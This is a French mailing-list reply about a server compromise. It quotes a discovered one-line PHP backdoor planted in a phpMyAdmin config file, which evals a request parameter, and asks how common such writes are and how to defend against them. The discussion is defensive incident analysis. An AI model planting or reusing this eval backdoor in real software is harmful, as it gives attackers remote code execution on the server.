Re: [HS] Serveur corrompu, besoin de conseil
Le jeudi 16 juin 2011, Romaric DEFAUX a écrit :
> C'est bon on a trouvé d'où ça vient. Et c'est moins grave que ce qu'on
> pensait (ouf !). Le serveur n'a pas été compromis (on en est sûr à 99%),
> le pirate aurait plutôt utilisé une faille dans un phpmyadmin.
> La ligne
> if(isset(\$_REQUEST['asc']))eval(stripslashes(\$_REQUEST['asc']));//'] =
> 'localhost'; est clairement suspecte.
> Bref, j'ai fini par trouver que c'était ça :
> http://www.whitefirdesign.com/resources/jfgjfr5jdfjvvcc-malware.html
> Romaric
---------------------------------------
Cette écriture dans le fichier "/etc/phpmyadmin/config.inc.ini"
est-elle possible dans bien des serveurs (ayant phpmyadmin) ?
Si oui, quelle parade ?
Merci.
Reply to: